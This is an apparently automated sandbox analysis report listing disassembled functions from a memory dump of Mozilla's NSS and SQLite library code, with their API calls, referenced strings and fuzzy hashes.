Download Yara Rule

APIs

Part of subcall function 6C7AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7ADAE2,?), ref: 6C7AC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7AF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7AF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C7AF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7AF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C87218C), ref: 6C7AF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C7AF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7AF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7AF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C7AF210

Part of subcall function 6C7552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C7AF1E9,?,00000000,?,?), ref: 6C7552F5
Part of subcall function 6C7552D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C75530F
Part of subcall function 6C7552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C755326
Part of subcall function 6C7552D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C7AF1E9,?,00000000,?,?), ref: 6C755340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7AF227

Part of subcall function 6C79FAB0: free.MOZGLUE(?,-00000001,?,?,6C73F673,00000000,00000000), ref: 6C79FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C7AF23E

Part of subcall function 6C79BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C74E708,00000000,00000000,00000004,00000000), ref: 6C79BE6A
Part of subcall function 6C79BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7504DC,?), ref: 6C79BE7E
Part of subcall function 6C79BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C79BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7AF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7AF3A8

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7AF3B3

Part of subcall function 6C752D20: PK11_DestroyObject.NSS3(?,?), ref: 6C752D3C
Part of subcall function 6C752D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C752D5F

Strings

/G6/, xrefs: 6C7AEFFE

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID: /G6/
API String ID: 1559028977-570549270
Opcode ID: 4fc7c88bad8691abaf7aa66fd7c75e3afec9c925ca407391d3d79d80ebb8801b
Instruction ID: 3ab2b7a5c099d07cbc092f4983d611d1f87371a559a215b6b3a1a7e2d89f3f22
Opcode Fuzzy Hash: 4fc7c88bad8691abaf7aa66fd7c75e3afec9c925ca407391d3d79d80ebb8801b
Instruction Fuzzy Hash: DFD17EB6E012059FDB14CFE9DA84A9EB7B5EF48308F158239E915A7711EB31E806CB50

Function 6C78A9A0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C78A9CA

Part of subcall function 6C7A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
Part of subcall function 6C7A0FF0: PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016
Part of subcall function 6C7A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C8A0B04,?), ref: 6C78A9F7

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C78AA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C78AA33
PK11_GetInternalKeySlot.NSS3 ref: 6C78AA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C78AA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6C78AAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6C78AB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C78AB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6C78AB85
PK11_FreeSymKey.NSS3(00000000), ref: 6C78AB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C78ABDC
PK11_FreeSymKey.NSS3(?), ref: 6C78ABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C78ABF7

Part of subcall function 6C78AC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C78AB3E,?,?,?), ref: 6C78AC35
Part of subcall function 6C78AC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C78AB3E,?,?,?), ref: 6C78AC55
Part of subcall function 6C78AC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C78AB3E,?,?), ref: 6C78AC70
Part of subcall function 6C78AC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C78AC92
Part of subcall function 6C78AC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C78AB3E), ref: 6C78ACD7

Strings

/G6/, xrefs: 6C78A9AC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID: /G6/
API String ID: 2602994911-570549270
Opcode ID: c2770485f58bd2df7d7518ec766b2e9585579b0ea14115465dd1341935d03cee
Instruction ID: 1fd1194df0bd8a8374fd40f4f206068b662cd79e13edbb17e0f306ba1355a2fa
Opcode Fuzzy Hash: c2770485f58bd2df7d7518ec766b2e9585579b0ea14115465dd1341935d03cee
Instruction Fuzzy Hash: 57712571A063019BD700CF69DE44B5BB7A5BF84768F104A39FE6497B80FB31D9488792

Function 6C73EF40 Relevance: 25.1, APIs: 10, Strings: 4, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73EF63

Part of subcall function 6C7487D0: PORT_NewArena_Util.NSS3(00000800,6C73EF74,00000000), ref: 6C7487E8
Part of subcall function 6C7487D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C73EF74,00000000), ref: 6C7487FD
Part of subcall function 6C7487D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C74884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C73F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C73F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C73F374
PL_strcasecmp.NSS3(6C882FD4,?), ref: 6C73F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C73F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C73F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C73F67D
CERT_DestroyName.NSS3(?), ref: 6C73F68B

Part of subcall function 6C748320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C748338
Part of subcall function 6C748320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C748364
Part of subcall function 6C748320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C74838E
Part of subcall function 6C748320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7483A5
Part of subcall function 6C748320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7483E3

Part of subcall function 6C7484C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C7484D9
Part of subcall function 6C7484C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C748528

Part of subcall function 6C748900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C73F599,?,00000000), ref: 6C748955

Strings

*, xrefs: 6C73F3C6
", xrefs: 6C73F21B
/G6/, xrefs: 6C73EF52
oid., xrefs: 6C73F2CF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$/G6/$oid.
API String ID: 4161946812-1920358892
Opcode ID: 0afe1eddd3ecf39d3b147199913815873e32b1bf083ca2b6fb4fac7742fa73d2
Instruction ID: 24310e7284338c249f080b2ece9af9423a3a9cb8e1e1506405f1e9a6c938719e
Opcode Fuzzy Hash: 0afe1eddd3ecf39d3b147199913815873e32b1bf083ca2b6fb4fac7742fa73d2
Instruction Fuzzy Hash: A1225C7160C3618BD310CE18CA9076AB7E6AB85398F149ABEE4DD87793E7319C05C793

Function 6C6CECC0 Relevance: 21.7, APIs: 8, Strings: 4, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C6CEF98

Strings

%s at line %d of [%.10s], xrefs: 6C6CF492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6CF483
/G6/, xrefs: 6C6CECCE
database corruption, xrefs: 6C6CF48D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$/G6/$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-816543663
Opcode ID: a7833a1d423756abb1d14853afffa249ceae84fe191be98bf2b6dd523a87f16b
Instruction ID: a5ae800181b24f20ca84f4f6c9677c079d1da28e534c48b715fdabc10efa7937
Opcode Fuzzy Hash: a7833a1d423756abb1d14853afffa249ceae84fe191be98bf2b6dd523a87f16b
Instruction Fuzzy Hash: FC620F30B042458FDB14CF69C480B9ABBF1EF49318F188199D9565BB92D735E882CBDB

Function 6C796C00 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C741C6F,00000000,00000004,?,?), ref: 6C796C3F

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C741C6F,00000000,00000004,?,?), ref: 6C796C60
PR_ExplodeTime.NSS3(00000000,6C741C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C741C6F,00000000,00000004,?,?), ref: 6C796C94

Strings

gfff, xrefs: 6C796D30
gfff, xrefs: 6C796D9C
gfff, xrefs: 6C796D66
/G6/, xrefs: 6C796C0F
gfff, xrefs: 6C796CFD
gfff, xrefs: 6C796CF5

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: /G6/$gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-4187616094
Opcode ID: 12fc289b4242a19ad88696e11c66c9bc9717ec0dbb67923240d3dcb9c3b11347
Instruction ID: cf983e449ff0da3a6644995e589622239859a90636e0a6fe3d3750019f24fad8
Opcode Fuzzy Hash: 12fc289b4242a19ad88696e11c66c9bc9717ec0dbb67923240d3dcb9c3b11347
Instruction Fuzzy Hash: 58516C72B015494FC718CDADDC526DABBDAABA4310F48C23AE442CB785D638E906C751

Function 6C810F20 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C811027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8110B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C811353

Strings

/G6/, xrefs: 6C810F2F
%02x, xrefs: 6C8112F6
NULL, xrefs: 6C81119E
$, xrefs: 6C8112A0
'%.*q', xrefs: 6C811217, 6C811292
%lld, xrefs: 6C81114B
-- , xrefs: 6C810FF5
zeroblob(%d), xrefs: 6C811223

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $/G6/$NULL$zeroblob(%d)
API String ID: 2619041689-1807939602
Opcode ID: 4b3b7669edbcf0c6d16797e9aba270705f654e0c5c3a89e423493bd4dab7c208
Instruction ID: 760cd739ec626b912659f5096c995b6a0cc7975acee553224679c721280b4053
Opcode Fuzzy Hash: 4b3b7669edbcf0c6d16797e9aba270705f654e0c5c3a89e423493bd4dab7c208
Instruction Fuzzy Hash: 40E1CF71A0C3819FD720CF18C980A6BBBF1AF96358F448D2DE88587B51E775E845CB42

Function 6C770EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C770F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C770FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C771006
PK11_FreeSymKey.NSS3(?), ref: 6C77101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C771033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C77103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C771048
memcpy.VCRUNTIME140(?,?,?), ref: 6C77108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7710BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7710D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C77112E

Part of subcall function 6C771570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7708C4,?,?), ref: 6C7715B8
Part of subcall function 6C771570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7708C4,?,?), ref: 6C7715C1
Part of subcall function 6C771570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77162E
Part of subcall function 6C771570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C771637

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 3121479ac997d1d7fc44e32ff420b06322510f34babaa554b0756e8de950e21c
Instruction ID: a93ed0159d500c4954679da7418137bbddd360fa500376b47d02876e5d886e2c
Opcode Fuzzy Hash: 3121479ac997d1d7fc44e32ff420b06322510f34babaa554b0756e8de950e21c
Instruction Fuzzy Hash: D571D1B1A002098FDF20CFA5CE98A6AB7B0FF44318F148639E50D9B711E771E954DBA0

Function 6C818FB0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C818FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8190DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C819118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8191C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C819209

Strings

UUUU, xrefs: 6C819255
/G6/, xrefs: 6C818FBE
3333, xrefs: 6C81925E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: /G6/$3333$UUUU
API String ID: 1967222509-91043487
Opcode ID: c373b9ad9acf8db88c7eed6a4db9c0fbd3738a0fef9415e27033d600c883f37b
Instruction ID: 7f265fdaef16eaf1dfa468d8b768aad2fdf1753e0558f7657c29a05fc14c29d9
Opcode Fuzzy Hash: c373b9ad9acf8db88c7eed6a4db9c0fbd3738a0fef9415e27033d600c883f37b
Instruction Fuzzy Hash: F9A19D72E001159FDB14CB69CD80B9EB7F5BB88324F094579D919A7741E73AEC11CB90

Function 6C6D0FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C6CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C72F9C9,?,6C72F4DA,6C72F9C9,?,?,6C6F369A), ref: 6C6CCA7A
Part of subcall function 6C6CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6CCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C6D103E
EnterCriticalSection.KERNEL32(?), ref: 6C6D1139
LeaveCriticalSection.KERNEL32(?), ref: 6C6D1190
sqlite3_free.NSS3(00000000), ref: 6C6D1227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C6D126E
sqlite3_free.NSS3(?), ref: 6C6D127F

Strings

winAccess, xrefs: 6C6D129B
/G6/, xrefs: 6C6D0FEC
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C6D1267

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: /G6/$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1834541331
Opcode ID: 7ea8305bf1b2b25a46c37fd4ded578963be5ffe9e2206793cc5ea42aa7bf547e
Instruction ID: 75a7603108530091513ffc7dedc4f2a6358d139c9ffaea8e9bf9def52a75c01f
Opcode Fuzzy Hash: 7ea8305bf1b2b25a46c37fd4ded578963be5ffe9e2206793cc5ea42aa7bf547e
Instruction Fuzzy Hash: 62710A317042019BEB249F69EC85A5E3775FBC7338F150639E91287A80DB75E841C7DA

Function 6C6DAEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C7FCF46,?,6C6CCDBD,?,6C7FBF31,?,?,?,?,?,?,?), ref: 6C6DB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C7FCF46,?,6C6CCDBD,?,6C7FBF31), ref: 6C6DB090
sqlite3_free.NSS3(?,?,?,?,?,?,6C7FCF46,?,6C6CCDBD,?,6C7FBF31), ref: 6C6DB0A2
CloseHandle.KERNEL32(?,?,6C7FCF46,?,6C6CCDBD,?,6C7FBF31,?,?,?,?,?,?,?,?,?), ref: 6C6DB100
sqlite3_free.NSS3(?,?,00000002,?,6C7FCF46,?,6C6CCDBD,?,6C7FBF31,?,?,?,?,?,?,?), ref: 6C6DB115
sqlite3_free.NSS3(?,?,?,?,?,?,6C7FCF46,?,6C6CCDBD,?,6C7FBF31), ref: 6C6DB12D

Part of subcall function 6C6C9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6DC6FD,?,?,?,?,6C72F965,00000000), ref: 6C6C9F0E
Part of subcall function 6C6C9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C72F965,00000000), ref: 6C6C9F5D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: b1b87597bcc6fe35a53c00bf6b1b4b4ffd6ddac1018dc75afa822ffd37b24f4a
Instruction ID: 18fedd76d11aa2e1e952c8f3a670403385d19ee92c63de7cc2fa7ca757c8a0cf
Opcode Fuzzy Hash: b1b87597bcc6fe35a53c00bf6b1b4b4ffd6ddac1018dc75afa822ffd37b24f4a
Instruction Fuzzy Hash: 5891D0B0A042068FDB14CF69D980AABB7B1FF85308F15463DE41697A51EB34F845CB9A

Function 6C6DEFB0 Relevance: 13.3, Strings: 10, Instructions: 815COMMON

Download Yara Rule

Strings

%s %T already exists, xrefs: 6C6DFAC8
sqlite_master, xrefs: 6C6DF0AB, 6C6DF2DA, 6C6DF757, 6C6DF93E
authorizer malfunction, xrefs: 6C6DF95C, 6C6DF9BF, 6C6DFA5E, 6C6DFA8B
/G6/, xrefs: 6C6DEFD8
not authorized, xrefs: 6C6DF957, 6C6DF9BA
sqlite_temp_master, xrefs: 6C6DF0A6, 6C6DF2D5
view, xrefs: 6C6DF061, 6C6DF071, 6C6DFAB7
there is already an index named %s, xrefs: 6C6DF9D7
